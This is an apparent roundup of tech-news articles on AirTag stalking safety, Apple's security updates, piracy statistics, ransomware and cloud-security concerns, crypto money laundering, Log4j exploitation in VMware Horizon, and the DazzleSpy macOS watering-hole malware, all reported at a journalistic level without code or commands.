Information Technology

Apple updated its Personal Safety User Guide in an attempt to better help customers and potential victims understand what to do if they find an

AirTag

 that may have been placed on their person or vehicle without their permission. 

In recent weeks, a spate of local and national news reports about stalking incidents and auto theft attempts involving AirTags has popped up. The reports typically involve someone finding an unknown AirTag secreted away in a handbag, tucked behind their vehicle’s license plate, or stashed somewhere else that will let a thief or stalker track the location of themselves or their vehicle. In what was almost certainly an effort to alleviate some of the negative public sentiment toward AirTags being caused by continued reports like this, Apple has updated its Personal Safety User Guide with new advice on what to do if you find an AirTag that may be tracking you for criminal purposes. The refresh was confirmed by an Apple spokesperson speaking with TechCrunch.While the guide itself isn’t exactly new, its availability in website form, as opposed to a downloadable PDF, is. It also now features an expanded “Stay safe with AirTag, and other Find My accessories” section, which includes more detailed steps for dealing with the discovery of an unknown AirTag for both iOS and Android device users. Apple didn’t go so far as to suggest in the expanded guide that any discovered trackers should be assumed to be tools in criminal activity. Instead, the company couched its advice in the possibility that the AirTag might simply be “attached to an item you are borrowing.” AirTags are designed to make a sound if they are separated from the Apple device that is registered to track them. This has resulted in many of the unknowing victims involved in these reports discovering the devices being used to track them if they themselves did not own an

iPhone

. If the user does own an iPhone, they should receive an alert from iOS’ built-in Find My app letting them know an unknown AirTag is moving with them. This is a safety feature Apple references in its Personal Safety User Guide and one that was specifically designed to prevent the types of criminal and invasive uses we’re talking about here. Unfortunately, there are many situations in which the sound emitted by an AirTag may be hard or impossible to detect. The relatively modest chirp let out by the small trackers would be difficult to pick up over the sound of a loud running car, for instance. Apple’s unwillingness, so far, to address this issue or offer any possible updates to the behavior of AirTags themselves has frustrated some privacy and safety advocates. 

To be fair, AirTags are far from the only devices that can be used for this purpose, and they are definitely not the first trackers small enough to be hidden on a person or car. Products from

Tile

,

Samsung

 and other brands with similar tracking capabilities were already available, as were devices from brands like Whistle that could be used to

track lost pets

. The latter even includes GPS functionality, meaning potential criminals could track their targets in situations where no amenable Bluetooth devices were nearby to help. The main reason why

Apple’s AirTags

 appear to be getting name-dropped in so many of these reports is the simple fact that the safety feature which Apple integrated to alert potential victims of the presence of an unknown AirTag is doing its job, leading to the discovery of the devices by potential victims. None of the trackers mentioned provide those same safety features, and all require the direct intervention of their owners in order to make a sound. As other news outlets have noted, this could well mean that the use of trackers like AirTags in criminal stalking or theft cases has been an ongoing, silent problem for much longer than most of us have realized. If that truly is the case, then it’s a situation that must be addressed by not just Apple but the tech industry as a whole.  More

Screenshots by Jason Cipriani/ZDNet
It’s time to update your Apple devices once again. Apple on Wednesday released several security updates for the iPhone, iPad, Apple TV, Apple Watch, and Mac lineup. More specifically, Apple released iOS 15.3, iPadOS 15.3, WatchOS 8.4, and macOS 12.12. The change log for each update only states that the update includes “bug fixes and security updates” but doesn’t mention any other changes or new features. Typically whenever Apple releases an update that takes a build number from something like 15.2.1 to 15.3, it includes more than just bug fixes. However, Apple’s security updates page details several issues that are fixed in the most recent updates. For example, iOS 15.3 and iPadOS 15.3 include 10 different security fixes that range from applications gaining access to your iCloud files to malicious applications gaining route privileges. The update also fixed the Safari bug that was first reported earlier this month. The issue allowed websites you visit to see your browsing history, and potentially even your Google User ID. You can update any of your iPhone or iPad by opening Settings then going to General > Software Update and following the prompts. 

On your Mac, open System Preferences > Software Update. Apple Watch owners can use the Watch app on their iPhone to install the latest update, while Apple TV users can follow the same steps that you use on the iPhone. With a healthy list of some potentially serious bugs and security issues now fixed across all of Apple’s hardware products. Hopefully we’ll see some new features and improvements in iOS 15.4. Did you find anything new in iOS 15.3? If so, let us know in the comments below. So far, we haven’t been able to find anything. More

Films like Godzilla vs. King Kong and TV shows like Loki and WandaVision topped Akamai’s list of the most pirated content in 2021. The company released a detailed report on its efforts to stop people from pirating both live content as well as films, TV, music, and books. The report also includes data from MUSO, which found that television is the most pirated content at just over 67 billion total visits to pirated content sites.The top 10 most pirated films from January to September 2021 are Godzilla vs. King Kong, Zack Snyder’s Justice League, Black Widow, F9, Mortal Kombat, The Suicide Squad, Cruella, Wonder Woman 1984, Raya and the Last Dragon, and Jungle Cruise.The most pirated TV shows include Loki, WandaVision, Rick and Morty season 5, The Falcon and the Winter Soldier, The Walking Dead season 10, Game of Thrones season 8, The Flash season 7, Vikings season 6, True Beauty, and Superman & Lois.When it comes to how people are accessing pirated content, MUSO found that more than 61% are doing so “directly” although it is not explained what exactly that means. About 29% of people are searching for pirated content and others are “accessing content via referrals from other websites, social media, display ads, or email ads.””Considering the television and film industries alone — including both public and private torrent files, as well as web downloads, stream ripping, and direct streaming — there were 82 billion visits to piracy websites between January and September 2021. If you add in music, software, and publishing to these figures, the total jumps to over 132 billion,” Akamai explained.”Globally, during the nine-month reporting window, the United States (13.5 billion), Russia (7.2 billion), India (6.5 billion), China (5.9 billion), and Brazil (4.5 billion) were the top five locations for piracy website visits.”

The US, Russia, and India account for more than 27 billion piracy website visits.
Akamai
MUSO data shows that the average visits per internet user reached 20.01 across the nine-month reporting window, with the United States, followed by Russia, and China ranking as the leading three sources of visitor traffic to sites with pirated TV content.Akamai noted that the numbers make sense because much of the content being pirated is not available legally in the countries most interested in them. Anime is also pirated profusely and Akamai found that the top domain for pirated content generated 940 million visits from January through September 2021.Surprisingly, MUSO data showed that publishing was the second more pirated content with more than 30 billion total visits.”The average visits per internet user reached 9.03 during the reporting window, with the United States, Japan, and Russia ranking as the top three sources of visitor traffic. The top piracy websites focus heavily on manga and other book-based content, with the top website clocking more than 955 million visits during the reporting period,” Akamai said. Film, music, and software rounded out the list of most pirated content. The film industry accounted for 14.5 billion website visits from January to September. Music sites saw 10.8 billion visits even as a number of sites closed down. The top traffic sources include India, followed by Iran and the United States, according to Akamai and MUSO. “Software piracy is another type of piracy that has existed online for almost as long as the internet has. It’s a broad category that includes video games as well as modern PC software. With 9 billion total visits, an average of 2.68 per internet user, a fifth-place showing is still a rather large problem,” Akamai explained.”Combined, the top three piracy websites accounted for more than 16% of the overall visitations in the top 100, with more than 722 million visits during the nine-month recording period. The top traffic sources were China, followed by Russia, and the United States.” More

Ransomware is the number one cybersecurity concern for Chief Information Security Officers (CISO) are facing at the beginning of 2022, but it’s just one of many issues which they’re attempting to tackle. According to research by Microsoft, addressing the threat posed by ransomware is the number one cybersecurity challenge currently facing CISOs, closely followed by configuring cloud security and protecting hybrid, multi-platform enterprise environments. Ransomware was the most significant cybersecurity issue during 2021 and, according to the survey, CISOs don’t think that’s going to change anytime soon, as cyber criminals continue attempts to encrypt networks and demand a ransom payment – which can be millions of dollars – for the decryption key. The threat is also increased by the rise of ransomware-as-a-service schemes which allow even more cyber criminals to conduct ransomware campaigns, putting organisations at even greater risk of falling victim to an opportunistic attack. “No longer do individual cybercriminals have to develop their own tools. Today, they can simply buy proven cybercrime kits and services to incorporate into their campaigns. This gives the average cybercriminal access to better tools and automation to enable scale and drive down costs,” said Vasu Jakkal, corporate vice president for security, identity and compliance at Microsoft.  “As a result, attacks of all types are on the rise, with the economics behind successful ransomware attacks fueling a rapid trajectory,” she added. SEE: A winning strategy for cybersecurity (ZDNet special report) 

But while ransomware is viewed as the number one threat, CISOs have a variety of other concerns, including cloud security, which has been pushed to the forefront due to the rise of hybrid working .  While cloud offers opportunities, it also comes with several security concerns which need to be addressed, For example, it’s useful for staff to be able to access corporate cloud accounts remotely, but the way they can be accessed from anywhere provides cyber criminals with additional avenues to infiltrate networks, especially if they’re able to steal the legitimate username and password of a real user. According to the Microsoft survey other key cybersecurity challenges CISOs are facing in 2022 include the challenge of recruiting security professionals, along with enabling user productivity without sacrificing security. Cloud security is the most desired investment for the year, along with the likes of vulnerability management and application security. “As security leaders look to mitigate threats now and in the near future, we’re seeing an increased focus on improving the prevention capabilities of the highest growth threat vectors, such as cloud security, access management, cloud workloads, hybrid work, and ransomware,” said Jakkal. Recommendations by Microsoft on how to improve cybersecurity throughout organisations includes the implementation of multifactor authentication (MFA), as well as shutting down legacy authentication methods which could be exploited by cyber criminals.  MORE ON CYBERSECURITY More

Cybercriminals managed to launder at least $8.6 billion worth of cryptocurrency in 2021, according to a new report from blockchain analytics company Chainalysis.

The company said the $8.6 billion represents a 30% increase in money laundering activity over 2020 but is dwarfed by 2019, which saw at least $10.9 billion laundered. Chainalysis said cybercriminals had laundered $33 billion worth of cryptocurrency since 2017. Chainalysis explained that these figures only represent funds derived from “cryptocurrency-native” crime, meaning cybercriminal activity such as darknet market sales or ransomware attacks in which profits are almost always derived in cryptocurrency rather than fiat currency. Chainalysis does not have a way to measure the fiat currency from drugs or crime that is converted into cryptocurrency after the fact. Kim Grauer, head of research at Chainalysis, told ZDNet that to give a sense of the importance of the $8.6 billion, there is no way to quantify the amount of money laundering in the fiat world. The report notes that while billions of dollars’ worth of cryptocurrency move from illicit addresses every year, most of it ends up at a small group of services, many of which “appear purpose-built for money laundering based on their transaction histories.”2021 represents the first year since 2018 where centralized exchanges didn’t receive the majority of funds sent by illicit addresses, with DeFi protocols making up much of the difference. DeFi protocols received 17% of all funds sent from illicit wallets — $900 million — in 2021 compared to just 2% in 2020. 

“Many of the hacks we saw this year were of DeFi protocols, so it makes sense that the funds were sent to DeFi services that can handle large amounts of liquidity from really any token you can imagine,” Grauer said. “We also know that criminals are always the fastest to adapt to the use of new technologies to evade detections, and this year was no different.”The report says addresses associated with theft sent just under half of their stolen funds to DeFi platforms — over $750 million worth of cryptocurrency in total. As Chainalysis previously reported, North Korea-affiliated hackers were responsible for $400 million worth of cryptocurrency hacks last year and used DeFi protocols extensively for money laundering. “This may be related to the fact that more cryptocurrency was stolen from DeFi protocols than any other type of platform last year. We also see a substantial amount of mixer usage in the laundering of stolen funds,” the researchers explained.”Scammers, on the other hand, send the majority of their funds to addresses at centralized exchanges. This may reflect scammers’ relative lack of sophistication. Hacking cryptocurrency platforms to steal funds takes more technical expertise than carrying out most scams we observe, so it makes sense that those cybercriminals would employ a more advanced money laundering strategy.” Grauer added that while it was not totally unexpected, the growth in the use of mixers to move funds was striking this year. “The amount of money going to mixers, particularly from bad actors such as North Korean hacking groups, continues to grow in significance,” Grauer said. Money laundering is also concentrated to a small number of services and a small number of deposit addresses, according to Chainalysis. The company found that 58% of all funds sent from illicit addresses moved to five services last year, compared to 54% in 2020.Just 583 deposit addresses received 54% of all funds sent from illicit addresses in 2021, the researchers found, and each of those 583 addresses received at least $1 million from illicit addresses. In total, they received just under $2.5 billion worth of cryptocurrency.”An even smaller group of 45 addresses received 24% of all funds sent from illicit addresses for a total of just under $1.1 billion. One deposit address received just over $200 million, all from wallets associated with the Finiko Ponzi scheme,” the researchers explained. “While money laundering activity remains quite concentrated, it’s less so than in 2020. That year, 55% of all cryptocurrency sent from illicit addresses went to just 270 service deposit addresses. Law enforcement action could be one possible reason money laundering activity became less concentrated.”The report cites the US Treasury Department’s sanctions against Russia-based OTC broker Suex and P2P exchange Chatex as one example of law enforcement action leading to money laundering activity becoming less concentrated. Chainalysis said several addresses associated with both services appeared in the 270 they identified as the biggest laundering addresses in last year’s report. The researchers theorized that cybercriminals began to disperse their money laundering after some of the services closed or after seeing the law enforcement action against certain platforms. “There is a consolidation point of funds flowing to laundering services, oftentimes hosted on exchanges, that are able to handle the movement of large quantities of funds,” Grauer said. “The key takeaway for us is that the criminal landscape might not be as large as you think. We have found this in years past and continue to highlight the relevance of structural money laundering in the cryptocrime landscape.”The report added that the 20 biggest money laundering deposit addresses received just 19% of all Bitcoin sent from illicit addresses, compared to 57% for stablecoins, 63% for Ethereum, and 68% for altcoins. More

Initial access broker group, Prophet Spider, has been found exploiting the Log4J vulnerability in VMware Horizon, according to a new report from researchers with BlackBerry Research & Intelligence and Incident Response teams.

more Log4j

Even though VMware released a patch in December and has published extensive guidance on how to mitigate the issue, many implementations remain unpatched. Tony Lee, vice president of global services technical operations at BlackBerry, told ZDNet that his team has found evidence correlating attacks from Prophet Spider with the exploitation of the Log4J vulnerability in VMware Horizon.”When an access broker group takes interest in a vulnerability whose scope is so unknown, it’s a good indication that attackers see significant value in its exploitation,” Lee said. “It’s likely that we will continue to see criminal groups exploring the opportunities of the Log4Shell vulnerability, so it’s an attack vector against which defenders need to exercise constant vigilance.”BlackBerry found mass deployments of cryptocurrency mining software and Cobalt Strike beacons but also discovered “an instance of exploitation containing tactics, techniques, and procedures relating to the Prophet Spider IAB.”They noted that the group is known to compromise networks and later sell access to ransomware operators. “One of the indicators that helped us attribute the event to this threat group was their use of the C:WindowsTemp7fde folder path to store malicious files. The threat actor also downloaded a copy of the wget.bin executable, which the group has historically used to get additional files onto infected hosts. The IP used in the download cradle has also been previously attributed to the Prophet Spider group,” the researchers wrote. 

Security firms and many other organizations have warned about Log4J vulnerabilities in VMware Horizon since the beginning of the year. The UK’s National Health Service (NHS) was one of the first to warn that hackers were attempting to exploit a Log4J vulnerability in VMware Horizon servers to establish web shells that could be used to distribute malware and ransomware, steal sensitive information, and complete other malicious attacks. A VMware spokesperson said the company is “working around the clock to patch and provide the necessary guidance for customers to do the same.””With SaaS products, the company providing the software can quickly and efficiently implement the security patches. But organizations using on-premises licenses of software products must take their own affirmative steps to apply the security patch in their own environment,” the company explained. VMware said that even with its security alerts and efforts to contact customers directly, they continue to see that some companies have not patched. “VMware Horizon products are vulnerable to critical Apache Log4j/Log4Shell vulnerabilities unless properly patched or mitigated using the information provided in our security advisory, VMSA 2021-0028, which was first published on Dec. 10, 2021, and updated regularly with new information” the spokesperson said. “Customers who have not applied either the patch or the latest workaround provided in VMware’s security advisory are at risk of being compromised-or may have already been compromised-by threat actors who are leveraging the Apache Log4shell vulnerability to compromise unpatched, internet-facing Horizon environments actively. Any time we see vulnerabilities that are as far-reaching as Log4J, it is critical that all impacted users move quickly to implement security responses.” More

Log4Shell affected hundreds of millions of devices and was cast as a critical tech emergency that would almost certainly be exploited attackers around the globe. But a month after the Apache Software Foundation disclosed Log4Shell in its Log4J library on December 9, the US Cybersecurity and Infrastructure Security Agency (CISA) said it hasn’t seen any major breach arise from the attack, with the exception of an attack on the Belgian Defense Ministry. 

more Log4j

The reason for the initial concern was that the Java-based application error logging component was embedded in so many in-house enterprise applications and hundreds of products from VMWare, Oracle, IBM, Cisco and others.SEE: A winning strategy for cybersecurity (ZDNet special report)Despite this, exploits using the vulnerability have been limited. For example, security firm Rapid7 saw a surge in exploit attempts against VMWare’s Horizon servers and Microsoft also observed a China-based double extortion ransomware gang NightSky targeting vulnerable instances of Horizon.  Despite the absence of immediate mass exploitation, Sophos security’s Chester Wisniewski backs the view that it will be a target for exploitation for years to come. Microsoft continues to rate the Log4j vulnerabilities as a “high-risk situation” for companies across the globe and reckons there is high potential for their expanded use. But for now, Wisniewski believes an immediate crisis has been swerved.   

“[T]he immediate threat of attackers mass exploiting Log4Shell was averted because the severity of the bug united the digital and security communities and galvanised people into action. This was seen back in 2000 with the Y2K bug and it seems to have made a significant difference here,” says Wisniewski.Sophos detected a huge surge in internet-scanning activity in mid-December – conducted by researchers or threat actors – that petered out by the end of January, when most exploitation was by crypto coin-mining malware. While Log4Shell is easy to exploit on some systems, Log4J is embedded in many applications, making actual exploitation more challenging. “Another factor to consider when evaluating the scanning numbers is that a Log4Shell type of flaw is exploited differently based on which application the Log4J code is in and how it has been integrated with that application. This results in a high volume of redundant scans trying different ways to exploit different applications,” says Wisniewski. CISA warned, however, that attackers might be waiting to use access gained through Log4Shell until alert levels fall. That is, attackers could lay dormant within a network, waiting to deploy malware months later. Wisniewski supports CISA’s cautionary stance.”Sophos has observed countries such as Iran and North Korea pounce on VPN vulnerabilities to gain access to targets’ networks and install backdoors before the targets have had a chance to deploy the patches, and then waiting months before using that access in an attack,” he says. As for the duration of Log4Shell, Wisniewski reckons internet-facing applications will be found and patched or taken offline. But that still leaves a ton of internally vulnerable systems that might never be discovered, hence Log4Shell will live on for years as a favorite target for penetration testers and state-backed threat actors. Though not the first major open-source software to rattle the internet, it did prompt talks in January between major tech players and the White House aimed at figuring out how to respond to and avert the next major open-source bug, in particular the transparency of the software supply chain.    More

Researchers have uncovered a new strain of macOS malware in targeted attacks against visitors to a Hong Kong pro-democracy radio station website. 

ZDNet Recommends

The website was used to facilitate a watering hole attack and to serve a Safari browser exploit to visitors, leading to the deployment and execution of spyware on victim machines. Dubbed DazzleSpy by ESET researchers, the malware is a backdoor for conducting surveillance on an infected Mac.  ESET’s investigation follows past research conducted by Google’s Threat Analysis Group (TAG) security team. On November 11, 2021, TAG said watering hole attacks had been spotted on a media outlet and pro-democracy political website targeting Hong Kong residents.  This attack utilized an XNU privilege escalation vulnerability in macOS Catalina, leading to the execution of the backdoor malware.  Now tracked as CVE-2021-30869, Apple has now patched the type confusion zero-day flaw.  “Based on our findings, we believe this threat actor to be a well-resourced group, likely state-backed, with access to their own software engineering team based on the quality of the payload code,” Google TAG said. 

ESET has now provided a breakdown of additional attack vectors used and the exploit itself.  The legitimate pro-democracy online radio station D100 was compromised to serve the payload via an iframe between September 30 and November 4, 2021. In addition, fake ‘liberate Hong Kong’ websites also delivered the malware. “Both distribution methods have something in common: they attract visitors from Hong Kong with pro-democracy sympathies,” ESET says. “It seems that they were the primary target of this threat.” The attack chain begins by running a script that checks what version of macOS is installed. JavaScript containing exploit code, mac.js, is deployed to trigger the WebKit engine flaw. (While technical details are scant, the researchers confirmed that Apple’s patch now resolves CVE-2021-30869.) It appears the exploit is used to obtain memory read and write access, with object address leaks and the ability to create fake JavaScript objects being the overall goal. The next step requires a Mach-O executable to be loaded into memory and to achieve code execution through a local privilege escalation weakness, allowing it to run as root and execute the next payload.  In ESET’s sample, the payload differs from TAG’s findings. The new DazzleSpy macOS malware has a range of capabilities, including collecting macOS data such as hardware UUIDs and serial numbers, extracting Wi-FI SSIDs, downloading user files on the infected machine enumerating files in Desktop, Downloads, and Documents folders, launching remote sessions, and executing shell commands.ESET says that the malware will also see if it is possible to take advantage of CVE-2019-8526, a critical vulnerability fixed in macOS Mojave 10.14.4. If the macOS version is below 10.14.4, keychain information is stolen. Once it has connected to a C2, secure communication appears to be a high priority.  “In practice, the same self-signed certificate is used for both the CA and the C&C server,” the researchers say. “The technique protects the malware’s communications from potential eavesdropping by refusing to send data if end-to-end encryption is not possible.” The cybersecurity researchers also say that the watering hole attack used has similarities with the deployment of the LightSpy implant. Kaspersky said in 2020 that the malware appeared on websites aimed at residents of Hong Kong. The cybersecurity firm temporarily named the advanced persistent threat (APT) group believed to be responsible as TwoSail Junk.    Trend Micro has also published research (.PDF) on the threat actor’s mobile activities.  “We cannot confirm at this point whether both campaigns are from the same group,” ESET noted.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More